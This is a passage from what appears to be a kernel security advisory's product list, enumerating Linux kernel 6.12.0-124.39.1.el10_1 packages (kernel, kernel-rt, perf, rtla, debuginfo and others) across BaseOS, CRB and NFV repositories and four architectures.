"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
